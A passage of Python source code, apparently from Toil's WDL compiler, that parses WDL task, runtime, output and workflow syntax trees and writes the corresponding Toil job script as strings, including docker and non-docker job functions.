an Array)\n elif isinstance(declaration_subAST.attr(\"type\"), wdl_parser.Ast):\n\n if declaration_subAST.attr(\"type\").attr(\"name\"):\n if isinstance(declaration_subAST.attr(\"type\").attr(\"name\"),\n wdl_parser.Terminal):\n var_type = declaration_subAST.attr(\"type\").attr(\n \"name\").source_string\n if isinstance(declaration_subAST.attr(\"type\").attr(\"name\"),\n wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(declaration_subAST.attr(\"type\").attr(\"name\"),\n wdl_parser.AstList):\n raise NotImplementedError\n\n # if the variable type goes deeper and is for instance: Array[Array[File]]\n if declaration_subAST.attr(\"type\").attr(\"subtype\"):\n if isinstance(\n declaration_subAST.attr(\"type\").attr(\"subtype\"),\n wdl_parser.Terminal):\n raise NotImplementedError\n if isinstance(\n declaration_subAST.attr(\"type\").attr(\"subtype\"),\n wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(\n declaration_subAST.attr(\"type\").attr(\"subtype\"),\n wdl_parser.AstList):\n for subtype in declaration_subAST.attr(\"type\").attr(\n \"subtype\"):\n var_type = var_type + subtype.source_string\n\n elif isinstance(declaration_subAST.attr(\"type\"),\n wdl_parser.AstList):\n raise NotImplementedError\n\n var_value = None # placeholder to be implemented potentially later\n\n return var_name, var_type, var_value\n\n def parse_task_rawcommand(self, rawcommand_subAST):\n '''\n Parses the rawcommand section of the WDL task AST subtree.\n\n Task \"rawcommands\" are divided into many parts. There are 2 types of\n parts: normal strings, & variables that can serve as changeable inputs.\n\n The following example command:\n 'echo ${variable1} ${variable2} > output_file.txt'\n\n Has 5 parts:\n Normal String: 'echo '\n Variable Input: variable1\n Normal String: ' '\n Variable Input: variable2\n Normal String: ' > output_file.txt'\n\n Variables can also have additional conditions, like 'sep', which is like\n the python ''.join() function and in WDL looks like: ${sep=\" -V \" GVCFs}\n and would be translated as: ' -V '.join(GVCFs).\n\n :param rawcommand_subAST: A subAST representing some bash command.\n :return: A list=[] of tuples=() representing the parts of the command:\n e.g. 
[(command_var, command_type, additional_conditions_list), ...]\n Where: command_var = 'GVCFs'\n command_type = 'variable'\n command_actions = {'sep': ' -V '}\n '''\n command_array = []\n for code_snippet in rawcommand_subAST.attributes[\"parts\"]:\n command_actions = {}\n\n # normal string\n if isinstance(code_snippet, wdl_parser.Terminal):\n command_var = code_snippet.source_string\n command_type = 'normal_string'\n\n # a variable like ${dinosaurDNA}\n if isinstance(code_snippet, wdl_parser.Ast):\n\n if isinstance(code_snippet.attributes[\"expr\"],\n wdl_parser.Terminal):\n command_var = code_snippet.attributes[\"expr\"].source_string\n command_type = 'variable'\n if isinstance(code_snippet.attributes[\"expr\"], wdl_parser.Ast):\n\n if code_snippet.attributes[\"expr\"].attributes['lhs']:\n if isinstance(\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'], wdl_parser.Terminal):\n command_var = \\\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'].source_string\n command_type = 'variable'\n if isinstance(\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'], wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(\n code_snippet.attributes[\"expr\"].attributes[\n 'lhs'], wdl_parser.Ast):\n raise NotImplementedError\n\n if code_snippet.attributes[\"expr\"].attributes['rhs']:\n raise NotImplementedError\n\n if isinstance(code_snippet.attributes[\"expr\"],\n wdl_parser.AstList):\n raise NotImplementedError\n\n # variables with context like ${sep=\" -V \" GVCFs}\n if code_snippet.attributes['attributes']:\n for additional_conditions in code_snippet.attributes[\n 'attributes']:\n keyword_for_a_command = \\\n additional_conditions.attributes['key'].source_string\n some_value_used_by_the_keyword = \\\n additional_conditions.attributes['value'].source_string\n command_actions[\n keyword_for_a_command] = some_value_used_by_the_keyword\n\n if isinstance(code_snippet, wdl_parser.AstList):\n raise NotImplementedError\n\n command_array.append((command_var,\n command_type,\n command_actions))\n return command_array\n\n def parse_task_runtime(self, runtime_subAST):\n '''\n Parses the runtime section of the WDL task AST subtree.\n\n The task \"runtime\" section currently supports context fields for a\n docker container, CPU resources, RAM resources, and disk resources.\n\n :param runtime_subAST: A subAST representing runtime parameters.\n :return: A list=[] of runtime attributes, for example:\n runtime_attributes = [('docker','quay.io/encode-dcc/map:v1.0'),\n ('cpu','2'),\n ('memory','17.1 GB'),\n ('disks','local-disk 420 HDD')]\n '''\n # map\n runtime_attributes = []\n if isinstance(runtime_subAST.attr(\"map\"), wdl_parser.Terminal):\n raise NotImplementedError\n elif isinstance(runtime_subAST.attr(\"map\"), wdl_parser.Ast):\n raise NotImplementedError\n elif isinstance(runtime_subAST.attr(\"map\"), wdl_parser.AstList):\n for mapping in runtime_subAST.attr(\"map\"):\n if isinstance(mapping, wdl_parser.Terminal):\n raise NotImplementedError\n elif isinstance(mapping, wdl_parser.Ast):\n map_key = mapping.attr(\"key\").source_string\n map_value = mapping.attr(\"value\").source_string\n runtime_attributes.append((map_key, map_value))\n elif isinstance(mapping, wdl_parser.AstList):\n raise NotImplementedError\n return runtime_attributes\n\n def parse_task_outputs(self, i):\n '''\n Parse the WDL output section.\n\n Outputs are like declarations, with a type, name, and value. 
Examples:\n\n ------------\n Simple Cases\n ------------\n\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n String idea = 'Lab grown golden eagle burgers.'\n var_name: 'idea'\n var_type: 'String'\n var_value: 'Lab grown golden eagle burgers.'\n\n File ideaFile = 'goldenEagleStemCellStartUpDisrupt.txt'\n var_name: 'ideaFile'\n var_type: 'File'\n var_value: 'goldenEagleStemCellStartUpDisrupt.txt'\n\n -------------------\n More Abstract Cases\n -------------------\n\n Array[File] allOfMyTerribleIdeas = glob(*.txt)[0]\n var_name: 'allOfMyTerribleIdeas'\n var_type**: 'File'\n var_value: [*.txt]\n var_actions: {'index_lookup': '0', 'glob': 'None'}\n\n **toilwdl.py converts 'Array[File]' to 'ArrayFile'\n\n :return: output_array representing outputs generated by the job/task:\n e.g. x = [(var_name, var_type, var_value, var_actions), ...]\n '''\n output_array = []\n for j in i.attributes['attributes']:\n if j.name == 'Output':\n var_base_type = j.attributes['type']\n var_base_name = j.attributes['name']\n var_base_value = j.attributes['expression']\n\n var_name = self.parse_task_output_name(var_base_name)\n var_type = self.parse_task_output_type(var_base_type)\n var_value, var_actions = self.parse_task_output_value(\n var_base_value)\n\n output_array.append(\n (var_name, var_type, var_value, var_actions))\n return output_array\n\n def parse_task_output_name(self, base_name_AST):\n '''\n Discern a task output's var_name.\n\n Example:\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n :param base_name_AST: An AST subTree representing a task output's name.\n :return: var_name\n '''\n if isinstance(base_name_AST, wdl_parser.Terminal):\n # \"txtFiles\" for Array[File] txtFiles = glob(*.txt)\n var_name = base_name_AST.source_string\n if isinstance(base_name_AST, wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(base_name_AST, wdl_parser.AstList):\n raise NotImplementedError\n\n return var_name\n\n def parse_task_output_type(self, base_type_AST):\n '''\n Discern a task output's var_type.\n\n Example:\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n :param base_type_AST: An AST subTree representing a task output's type.\n :return: var_type\n '''\n\n if isinstance(base_type_AST, wdl_parser.Terminal):\n # primitive_type: 'Boolean' | 'Int' | 'Float' | 'File' | 'String'\n var_type = base_type_AST.source_string\n if isinstance(base_type_AST, wdl_parser.Ast):\n # array_type: 'Array' '[' ($primitive_type | $object_type | $array_type) ']'\n # concatenate into type + subtype1 + subtype2 + ...\n if isinstance(base_type_AST.attributes['name'],\n wdl_parser.Terminal):\n # Something like \"Array\" for Array[File] txtFiles = glob(*.txt)\n var_type = base_type_AST.attributes['name'].source_string\n if isinstance(base_type_AST.attributes['subtype'],\n wdl_parser.AstList):\n for each_subtype in base_type_AST.attributes['subtype']:\n # \"File\" for Array[File] txtFiles = glob(*.txt)\n var_type = var_type + each_subtype.source_string\n if isinstance(base_type_AST, wdl_parser.AstList):\n raise NotImplementedError\n\n return var_type\n\n def parse_task_output_value(self, base_value_AST):\n '''\n Discern a task output's var_value.\n\n Example:\n 'Int num = 7'\n var_name: 'num'\n var_type: 'Int'\n var_value: 7\n\n Sometimes this does not exist though, for example:\n 'File x = stdout()'\n var_name: 'x'\n var_type: 'File'\n var_value:\n\n In which case, default to just ''. 
'stdout' is added to the var actions.\n\n :param base_value_AST: An AST subTree representing a task output's value.\n :return var_value, var_action: The variable's declared value and any\n special actions that need to be taken.\n '''\n\n var_action = {}\n\n # a primitive var_value like '7' (shown above)\n if isinstance(base_value_AST, wdl_parser.Terminal):\n var_value = base_value_AST.source_string\n\n # this is not a primitive\n if isinstance(base_value_AST, wdl_parser.Ast):\n orderedDictOfVars = base_value_AST.attributes\n\n if 'name' in orderedDictOfVars:\n var_value_name = orderedDictOfVars['name']\n if isinstance(var_value_name, wdl_parser.Terminal):\n var_action[var_value_name.source_string] = 'None'\n\n if 'params' in orderedDictOfVars:\n var_value_params = orderedDictOfVars['params']\n if isinstance(var_value_params, wdl_parser.AstList):\n var_value = []\n for param in var_value_params:\n if isinstance(param, wdl_parser.Terminal):\n var_value.append(param.source_string)\n\n # mostly determine actions for specific outputs\n if 'lhs' in orderedDictOfVars:\n var_value_lhs = base_value_AST.attributes['lhs']\n if isinstance(var_value_lhs, wdl_parser.Ast):\n orderedDictOfVars = var_value_lhs.attributes\n if 'name' in orderedDictOfVars:\n var_value_name = orderedDictOfVars['name']\n if isinstance(var_value_name, wdl_parser.Terminal):\n var_action[var_value_name.source_string] = 'None'\n if 'params' in orderedDictOfVars:\n var_value_params = orderedDictOfVars['params']\n if isinstance(var_value_params, wdl_parser.Terminal):\n var_value = [var_value_params]\n if isinstance(var_value_params, wdl_parser.AstList):\n var_value = []\n for param in var_value_params:\n if isinstance(param, wdl_parser.Terminal):\n var_value.append(param.source_string)\n\n # this is not implemented at the moment, but later will be important\n # for returning index values and should be incorporated below for\n # 'ArrayOrMapLookup' and such-like.\n if 'rhs' in orderedDictOfVars:\n var_value_rhs = orderedDictOfVars['rhs']\n if isinstance(var_value_rhs, wdl_parser.Terminal):\n raise NotImplementedError\n if isinstance(var_value_rhs, wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(var_value_rhs, wdl_parser.AstList):\n raise NotImplementedError\n\n if base_value_AST.name == 'ArrayOrMapLookup':\n try:\n index_value = base_value_AST.attributes['rhs'].source_string\n var_action['index_lookup'] = index_value\n except:\n raise NotImplementedError\n\n if not var_value:\n var_value = ''\n\n return var_value, var_action\n\n def create_workflows_dict(self, ast):\n '''\n Parse each \"Workflow\" in the AST. This will create self.workflows_dictionary,\n where each called job is a tuple key of the form: (priority#, job#, name, alias).\n\n :return: Creates the self.workflows_dictionary necessary for much of the\n parser. Returning it is only necessary for unittests.\n '''\n workflows = self.find_asts(ast, 'Workflow')\n for workflow in workflows:\n self.parse_workflow(workflow)\n return self.workflows_dictionary\n\n def parse_workflow(self, workflow):\n '''\n Parses a WDL workflow AST subtree.\n\n Currently looks at and parses 3 sections:\n 1. Declarations (e.g. string x = 'helloworld')\n 2. Calls (similar to a python def)\n 3. 
Scatter (which expects to map to a Call or multiple Calls)\n\n Returns nothing but creates the self.workflows_dictionary necessary for much\n of the parser.\n\n :param workflow: An AST subtree of a WDL \"Workflow\".\n :return: Returns nothing but adds a workflow to the\n self.workflows_dictionary necessary for much of the parser.\n '''\n workflow_name = workflow.attr('name').source_string\n\n wf_declared_dict = {}\n for section in workflow.attr(\"body\"):\n\n if section.name == \"Declaration\":\n var_name, var_map = self.parse_workflow_declaration(section)\n wf_declared_dict[var_name] = var_map\n self.workflows_dictionary.setdefault(workflow_name, {})[\n 'wf_declarations'] = wf_declared_dict\n\n if section.name == \"Scatter\":\n self.parse_workflow_scatter(section, workflow_name)\n self.task_priority = self.task_priority + 1\n\n if section.name == \"Call\":\n self.task_priority = self.task_priority + 1\n self.task_number = self.task_number + 1\n task_being_called = section.attributes['task'].source_string\n if section.attributes['alias']:\n task_alias = section.attributes['alias'].source_string\n else:\n task_alias = task_being_called\n job = self.parse_workflow_call(section)\n self.workflows_dictionary.setdefault((self.task_priority,\n self.task_number,\n task_being_called,\n task_alias), {})[\n 'job_declarations'] = job\n\n def parse_workflow_declaration(self, wf_declaration_subAST):\n '''\n Parses a WDL declaration AST subtree into a string and a python\n dictionary containing its 'type' and 'value'.\n\n For example:\n var_name = refIndex\n var_map = {'type': File,\n 'value': bamIndex}\n\n :param wf_declaration_subAST: An AST subtree of a workflow declaration.\n :return: var_name, which is the name of the declared variable\n :return: var_map, a dictionary with keys for type and value.\n e.g. {'type': File, 'value': bamIndex}\n '''\n var_map = {}\n tsv = False\n if isinstance(wf_declaration_subAST.attr(\"type\"), wdl_parser.Terminal):\n var_type = wf_declaration_subAST.attr(\"type\").source_string\n elif isinstance(wf_declaration_subAST.attr(\"type\"), wdl_parser.Ast):\n var_type = wf_declaration_subAST.attr(\"type\").attributes[\n \"name\"].source_string\n elif isinstance(wf_declaration_subAST.attr(\"type\"), wdl_parser.AstList):\n raise NotImplementedError\n var_name = wf_declaration_subAST.attr(\"name\").source_string\n\n # only read_tsv currently supported\n tsv_array = []\n if wf_declaration_subAST.attr(\"expression\"):\n wdl_function_called = \\\n wf_declaration_subAST.attr(\"expression\").attributes[\n 'name'].source_string\n if wdl_function_called == 'read_tsv':\n # get all params for 'read_tsv'\n # expecting one file name pointing to a path in the JSON/YML secondary file\n for j in wf_declaration_subAST.attr(\"expression\").attributes[\n 'params']:\n filename = j.source_string\n tsv_filepath = self.json_dict[filename]\n tsv_array = self.create_tsv_array(tsv_filepath)\n self.tsv_dict[var_name] = tsv_array\n tsv = True\n\n if var_name in self.json_dict:\n var_value = self.json_dict[var_name]\n # deal with arrays other than tsv files\n elif var_type == 'Array':\n pass\n else:\n raise RuntimeError(\n 'Variable in workflow declarations not found in secondary file.')\n\n if tsv:\n var_map['type'] = var_type\n var_map['value'] = tsv_array\n else:\n var_map['type'] = var_type\n var_map['value'] = var_value\n\n return var_name, var_map\n\n def parse_workflow_scatter(self, section, workflow_name):\n # name of iterator; e.g. 
'sample'\n scatter_counter = section.attributes['item'].source_string\n\n # name of collection to iterate over\n scatter_collection = section.attributes['collection'].source_string\n\n self.workflows_dictionary.setdefault('scatter_calls', {})[\n scatter_collection] = scatter_counter\n\n if scatter_collection in self.workflows_dictionary[workflow_name][\n 'wf_declarations']:\n if self.workflows_dictionary[workflow_name]['wf_declarations'][\n scatter_collection]['type'] == 'Array':\n scatter_array = \\\n self.workflows_dictionary[workflow_name]['wf_declarations'][\n scatter_collection]['value']\n self.parse_workflow_scatter_array(section, scatter_array)\n else:\n raise RuntimeError(\n 'Scatter failed. Scatter collection is not an array.')\n else:\n raise RuntimeError(\n 'Scatter failed. Scatter collection not found in workflows_dictionary.')\n\n def parse_workflow_scatter_array(self, section, scatter_array):\n scatter_num = 0\n for set_of_vars in scatter_array:\n for j in section.attributes['body']:\n self.task_number = self.task_number + 1\n task_being_called = j.attributes['task'].source_string\n if j.attributes['alias']:\n task_alias = j.attributes['alias'].source_string\n else:\n task_alias = task_being_called\n job = self.parse_workflow_call(j, scatter_num=str(scatter_num))\n self.workflows_dictionary.setdefault((self.task_priority,\n self.task_number,\n task_being_called,\n task_alias), {})[\n 'job_declarations'] = job\n scatter_num = scatter_num + 1\n\n def parse_workflow_call(self, i, scatter_num=None):\n '''\n Parses a WDL workflow call AST subtree to give the variable mappings for\n that particular job/task \"call\".\n\n :param i: WDL workflow job object\n :return: python dictionary of io mappings for that job call\n '''\n io_map = {}\n\n if i.attributes['body']:\n if i.attributes['body'].attributes['io']:\n for g in i.attributes['body'].attributes['io']:\n for k in g.attributes['map']:\n if isinstance(k.attributes['key'], wdl_parser.Terminal):\n key_name = k.attributes['key'].source_string\n if isinstance(k.attributes['value'],\n wdl_parser.Terminal):\n value_name = k.attributes['value'].source_string\n value_type = k.attributes['value'].str\n if isinstance(k.attributes['key'], wdl_parser.Ast):\n raise NotImplementedError\n if isinstance(k.attributes['value'], wdl_parser.Ast):\n if k.attributes['value'].attributes[\n 'rhs'].str == 'integer':\n output_variable = \\\n k.attributes['value'].attributes[\n 'rhs'].source_string\n task = k.attributes['value'].attributes[\n 'lhs'].source_string\n if scatter_num:\n value_name = task + '[' + scatter_num + '][' + output_variable + ']'\n else:\n value_name = task + '[' + output_variable + ']'\n value_type = 'index_value'\n elif k.attributes['value'].attributes[\n 'rhs'].str == 'identifier':\n output_variable = \\\n k.attributes['value'].attributes[\n 'rhs'].source_string\n task = k.attributes['value'].attributes[\n 'lhs'].source_string\n value_name = task + ' ' + output_variable\n value_type = 'output'\n else:\n raise RuntimeError('Unsupported rhs type.')\n\n io_map.setdefault(key_name, {})['name'] = value_name\n io_map.setdefault(key_name, {})['type'] = value_type\n return (io_map)\n\n def write_modules(self):\n # string used to write imports to the file\n module_string = heredoc_wdl('''\n from toil.job import Job\n from toil.common import Toil\n from toil.lib.docker import apiDockerCall\n from toil.wdl.toilwdl import generate_docker_bashscript_file\n from toil.wdl.toilwdl import recursive_glob\n import fnmatch\n import subprocess\n import 
os\n import errno\n import glob\n import time\n import shutil\n import shlex\n import uuid\n import logging\n\n logger = logging.getLogger(__name__)\n\n\n ''')\n return module_string\n\n def write_main(self):\n '''\n Writes out a huge string representing the main section of the python\n compiled toil script.\n\n Currently looks at and writes 5 sections:\n 1. JSON Variables (includes importing and preparing files as tuples)\n 2. TSV Variables (includes importing and preparing files as tuples)\n 3. CSV Variables (includes importing and preparing files as tuples)\n 4. Wrapping each WDL \"task\" function as a toil job\n 5. List out children and encapsulated jobs by priority, then start job0.\n\n This should create variable declarations necessary for function calls.\n Map file paths appropriately and store them in the toil fileStore so\n that they are persistent from job to job. Create job wrappers for toil.\n And finally write out, and run the jobs in order of priority using the\n addChild and encapsulate commands provided by toil.\n\n :return: giant string containing the main def for the toil script.\n '''\n\n main_section = ''\n\n # write out the JSON/YML file declarations\n main_header = self.write_main_header()\n main_section = main_section + main_header\n\n # write out the JSON/YML file declarations\n main_section = main_section + '\\n\\n # JSON Variables\\n'\n scatter_vars_to_write = self.write_main_JSON()\n main_section = main_section + scatter_vars_to_write\n\n # write out TSV variable declarations\n main_section = main_section + '\\n\\n # TSV Variables\\n'\n scatter_vars_to_write = self.write_main_arrayarrayfile(self.tsv_dict)\n main_section = main_section + scatter_vars_to_write\n\n # write out CSV variable declarations\n main_section = main_section + '\\n\\n # CSV Variables\\n'\n scatter_vars_to_write = self.write_main_arrayarrayfile(self.csv_dict)\n main_section = main_section + scatter_vars_to_write\n\n # write toil job wrappers with input vars\n jobs_to_write = self.write_main_jobwrappers()\n main_section = main_section + jobs_to_write\n\n # write toil job calls\n jobs_to_write = self.write_main_jobcalls()\n main_section = main_section + jobs_to_write\n\n # write toil job stats\n jobs_to_write = self.write_main_stats()\n main_section = main_section + jobs_to_write\n\n return main_section\n\n def write_main_header(self):\n log_dir = os.path.join(self.output_directory, \"wdl-stats.log\")\n main_header_dict = {\"log_dir\": log_dir}\n main_header = heredoc_wdl('''\n\n if __name__==\"__main__\":\n options = Job.Runner.getDefaultOptions(\"./toilWorkflowRun\")\n with Toil(options) as toil:\n start = time.time()\n with open(\"{log_dir}\", \"a+\") as f:\n f.write(\"Starting WDL Job @ \" + str(time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())) + \"\\\\n\\\\n\")\n\n ''', main_header_dict)\n return main_header\n\n def write_main_arrayarrayfile(self, aaf_dict):\n '''\n Writes a loop used to import files from Array[Array[File]] type\n objects (typically created by csv and tsv files).\n\n :return: A string representing this loop.\n '''\n main_section = ''\n for aaf in aaf_dict:\n if aaf in self.workflows_dictionary['scatter_calls']:\n iterator = self.workflows_dictionary['scatter_calls'][aaf]\n\n arrayarray_dict = {\"aaf\": aaf,\n \"iterator\": iterator,\n \"aaf_value\": str(self.tsv_dict[aaf])}\n arrayarray_loop = heredoc_wdl('''\n {aaf} = []\n {aaf}0 = {aaf_value}\n for {iterator}0 in {aaf}0:\n {iterator} = []\n for i in {iterator}0:\n if os.path.isfile(str(i)):\n {iterator}0 = 
toil.importFile(\"file://\" + os.path.abspath(i))\n {iterator}0_preserveThisFilename = os.path.basename(i)\n {iterator}.append(({iterator}0, {iterator}0_preserveThisFilename))\n else:\n {iterator}.append(i)\n {aaf}.append({iterator})''', arrayarray_dict,\n indent=' ')\n main_section = main_section + arrayarray_loop\n # write for docker as well\n return main_section\n\n def write_main_JSON(self):\n '''\n Writes file imports and declared variables from the secondary JSON file.\n :return: A string representing these file imports and declared variables.\n '''\n main_section = ''\n\n input_dict = self.json_dict\n for dict_var in input_dict:\n v = input_dict[dict_var]\n # WDL sometimes supplies a list of file paths\n # later potentially implement a catch for a list of lists\n if type(v) is list:\n list_iterator = 0\n for item in v:\n importFile_section = self.write_main_importFile(item,\n dict_var,\n list_iterator)\n main_section = main_section + importFile_section\n list_iterator = list_iterator + 1\n list_iterator = 0\n if os.path.isfile(v[0]):\n main_section = main_section + ' ' + dict_var + ' = ['\n for item in v:\n main_section = main_section + '(' + dict_var + str(list_iterator) + ', ' + dict_var + str(list_iterator) + '_preserveThisFilename), '\n list_iterator = list_iterator + 1\n if main_section.endswith(', '):\n main_section = main_section[:-2]\n main_section = main_section + ']\\n'\n else:\n main_section = main_section + ' ' + dict_var + ' = ['\n for item in v:\n main_section = main_section + '(' + dict_var + str(list_iterator) + '), '\n if main_section.endswith(', '):\n main_section = main_section[:-2]\n main_section = main_section + ']\\n'\n else:\n main_section = main_section + self.write_main_importFile(v, dict_var)\n return main_section\n\n def write_main_importFile(self, item, input_var, list_iterator=None):\n '''\n Writes file imports and declared variables.\n\n :param item:\n :param input_var:\n :param list_iterator:\n :return: A string representing these file imports and declared variables.\n '''\n main_section = ''\n\n # if it's a file, then import and save the original filename\n if os.path.isfile(str(item)) or os.path.isfile(str(os.path.join(os.getcwd(), item))):\n filename = os.path.basename(item)\n if list_iterator is None:\n main_section = main_section + ' ' + input_var + '0 = toil.importFile(\"file://' + os.path.abspath(item) + '\")\\n'\n main_section = main_section + ' ' + input_var + '0_preserveThisFilename = \"' + filename + '\"\\n'\n main_section = main_section + ' ' + input_var + ' = (' + input_var + '0, ' + input_var + '0_preserveThisFilename)\\n'\n else:\n main_section = main_section + ' ' + input_var + str(\n list_iterator) + ' = toil.importFile(\"file://' + os.path.abspath(\n item) + '\")\\n'\n main_section = main_section + ' ' + input_var + str(\n list_iterator) + '_preserveThisFilename = \"' + filename + '\"\\n'\n # elif string, add quotes\n elif isinstance(item, (str, unicode)):\n if list_iterator is None:\n main_section = main_section + ' ' + input_var + ' = \"' + item + '\"\\n'\n else:\n main_section = main_section + ' ' + input_var + str(\n list_iterator) + ' = \"' + item + '\"\\n'\n # otherwise, just simply declare the variable\n else:\n if list_iterator is None:\n main_section = main_section + ' ' + input_var + ' = ' + item + '\\n'\n else:\n main_section = main_section + ' ' + input_var + str(list_iterator) + ' = ' + item + '\\n'\n return main_section\n\n def write_main_jobwrappers(self):\n '''\n Writes out 'jobs' as wrapped toil objects in preparation 
for calling.\n\n :return: A string representing this.\n '''\n main_section = ''\n\n # toil cannot technically start with multiple jobs, so an empty\n # 'initialize_jobs' function is always called first to get around this\n main_section = main_section + '\\n job0 = Job.wrapJobFn(initialize_jobs)\\n'\n\n # declare each job in main as a wrapped toil function in order of priority\n job_declaration_dict = self.mk_ordered_dict_of_all_job_input_params()\n for job_wrap in job_declaration_dict:\n main_section = main_section + ' ' + job_wrap + ' = Job.wrapJobFn('\n for var in job_declaration_dict[job_wrap]:\n main_section = main_section + var + ', '\n main_section = main_section[:-2]\n main_section = main_section + ')\\n'\n main_section = main_section + '\\n'\n\n return main_section\n\n def write_main_jobcalls(self):\n '''\n Writes out 'job' calls in order of priority.\n\n :return: A string representing this.\n '''\n main_section = ''\n skip_first = 1\n\n for priority in range(self.task_priority + 1):\n for job_declaration in self.workflows_dictionary:\n if isinstance(job_declaration, (list, tuple)):\n if job_declaration[0] == priority:\n main_section = main_section + ' job0.addChild(job' + str(\n job_declaration[1]) + ')\\n'\n if skip_first == 0:\n main_section = main_section + '\\n job0 = job0.encapsulate()\\n'\n skip_first = 0\n if main_section.endswith('\\n job0 = job0.encapsulate()\\n'):\n main_section = main_section[:-34]\n main_section = main_section + ' toil.start(job0)\\n\\n'\n return main_section\n\n def write_main_stats(self):\n '''\n Writes statements giving a runtime to output_directory/wdl-stats.log.\n\n :return: A string containing this.\n '''\n log_dir = os.path.join(self.output_directory, \"wdl-stats.log\")\n main_section_dict = {\"log_dir\": log_dir}\n main_section = heredoc_wdl('''\n end = time.time()\n with open(\"{log_dir}\", \"a+\") as f:\n f.write(\"Ending WDL Job @ \" + str(time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())))\n f.write(\"\\\\n\")\n f.write(\"Total runtime: %2.2f sec\" % (end - start))\n f.write(\"\\\\n\\\\n\")\n f.write(\"\\\\n\" + \"-\"*80 + \"\\\\n\")''', main_section_dict,\n indent=' ')\n return main_section\n\n def write_functions(self):\n '''\n Writes out a python function for each WDL \"task\" object.\n\n :return: a giant string containing the meat of the job defs.\n '''\n\n # toil cannot technically start with multiple jobs, so an empty\n # 'initialize_jobs' function is always called first to get around this\n fn_section = \"def initialize_jobs(job):\\n\" + \\\n \" job.fileStore.logToMaster('''initialize_jobs''')\\n\\n\"\n\n list_of_jobs_to_write = self.return_one_job_per_priority()\n\n for job in list_of_jobs_to_write:\n needs_docker = self.determine_if_docker_job(job)\n if needs_docker:\n function_to_write = self.write_docker_function(job)\n else:\n function_to_write = self.write_nondocker_function(job)\n\n fn_section = fn_section + function_to_write\n\n return fn_section\n\n def write_nondocker_function(self, job):\n '''\n Writes out a python function for each WDL \"task\" object.\n\n Each python function is a unit of work written out as a string in\n preparation to being written out to a file. In WDL, each \"job\" is\n called a \"task\". Each WDL task is written out in multiple steps:\n\n 1: Header and inputs (e.g. 'def mapping(self, input1, input2)')\n 2: Log job name (e.g. 'job.fileStore.logToMaster('initialize_jobs')')\n 3: Create temp dir (e.g. 
'tempDir = job.fileStore.getLocalTempDir()')\n 4: import filenames and use readGlobalFile() to get files from the\n jobStore\n 5: Reformat commandline variables (like converting to ' '.join(files)).\n 6: Commandline call using subprocess.Popen().\n 7: Write the section returning the outputs. Also logs stats.\n\n :return: a giant string containing the meat of the job defs for the toil script.\n '''\n\n fn_section = ''\n\n job_priority = job[0]\n job_number = job[1]\n job_task_reference = job[2] # default name\n job_alias = job[\n 3] # reassigned name (optional; default if not assigned)\n\n # get all variable declarations for this particular job\n job_declaration_array = self.get_job_declarations(job)\n\n # write the function header\n function_header = self.write_function_header(job, job_declaration_array)\n fn_section = fn_section + function_header\n\n # log to toil which job is being run when this function is called\n fn_start_dict = {\"job_alias\": job_alias}\n fn_start = heredoc_wdl('''\n job.fileStore.logToMaster(\"{job_alias}\")\n start = time.time()\n\n tempDir = job.fileStore.getLocalTempDir()\n\n ''', fn_start_dict, indent=' ')\n fn_section = fn_section + fn_start\n\n # import files into the job store using readGlobalFile()\n readglobalfiles_declarations = self.write_function_readglobalfiles(job,\n job_declaration_array)\n fn_section = fn_section + readglobalfiles_declarations\n\n # write out commandline keywords\n cmdline = self.write_function_cmdvarprep(job, docker=False)\n fn_section = fn_section + cmdline\n\n # write out commandline keywords\n cmdline = self.write_function_cmdline(job, docker=False)\n fn_section = fn_section + cmdline\n\n subprocesspopen = self.write_function_subprocesspopen(job)\n fn_section = fn_section + subprocesspopen\n\n # write the outputs for the definition to return\n return_outputs = self.write_function_outputreturn(job,\n job_task_reference)\n fn_section = fn_section + return_outputs\n\n return fn_section\n\n def write_docker_function(self, job):\n '''\n Writes out a python function for each WDL \"task\" object.\n\n Each python function is a unit of work written out as a string in\n preparation to being written out to a file. In WDL, each \"job\" is\n called a \"task\". Each WDL task is written out in multiple steps:\n\n 1: Header and inputs (e.g. 'def mapping(self, input1, input2)')\n 2: Log job name (e.g. 'job.fileStore.logToMaster('initialize_jobs')')\n 3: Create temp dir (e.g. 'tempDir = job.fileStore.getLocalTempDir()')\n 4: Make a new folder for the execution to take place in\n 5: import filenames and use readGlobalFile() to get files from the\n jobStore\n 6: Write the line to create a bashscript file.\n 6: Reformat commandline variables (like converting to '/data/' + file).\n 7: apiDockerCall() to run docker.\n 8: Write the section returning the outputs. 
Also logs stats.\n\n :return: a giant string containing the meat of the job defs for the toil script.\n '''\n\n fn_section = ''\n\n job_priority = job[0]\n job_number = job[1]\n job_task_reference = job[2] # default name\n job_alias = job[\n 3] # reassigned name (optional; default if not assigned)\n\n # get all variable declarations for this particular job\n job_declaration_array = self.get_job_declarations(job)\n\n # write the function header\n function_header = self.write_function_header(job, job_declaration_array)\n fn_section = fn_section + function_header\n\n # log to toil which job is being run when this function is called\n fn_start_dict = {\"job_alias\": job_alias}\n fn_start = heredoc_wdl('''\n job.fileStore.logToMaster(\"{job_alias}\")\n start = time.time()\n\n tempDir = job.fileStore.getLocalTempDir()\n\n try:\n os.makedirs(tempDir + '/execution')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise''', fn_start_dict, indent=' ')\n fn_section = fn_section + fn_start\n\n # import files into the job store using readGlobalFile()\n readglobalfiles_declarations = self.write_function_readglobalfiles(job,\n job_declaration_array)\n fn_section = fn_section + readglobalfiles_declarations\n\n # prep Array[File] commandline keywords\n cmdline = self.write_function_cmdvarprep(job, docker=True)\n fn_section = fn_section + cmdline\n\n # write out commandline keywords\n cmdline = self.write_function_cmdline(job, docker=True)\n fn_section = fn_section + cmdline\n\n bashscriptline = self.write_function_bashscriptline(job_task_reference,\n job_alias)\n fn_section = fn_section + bashscriptline\n\n docker_image = 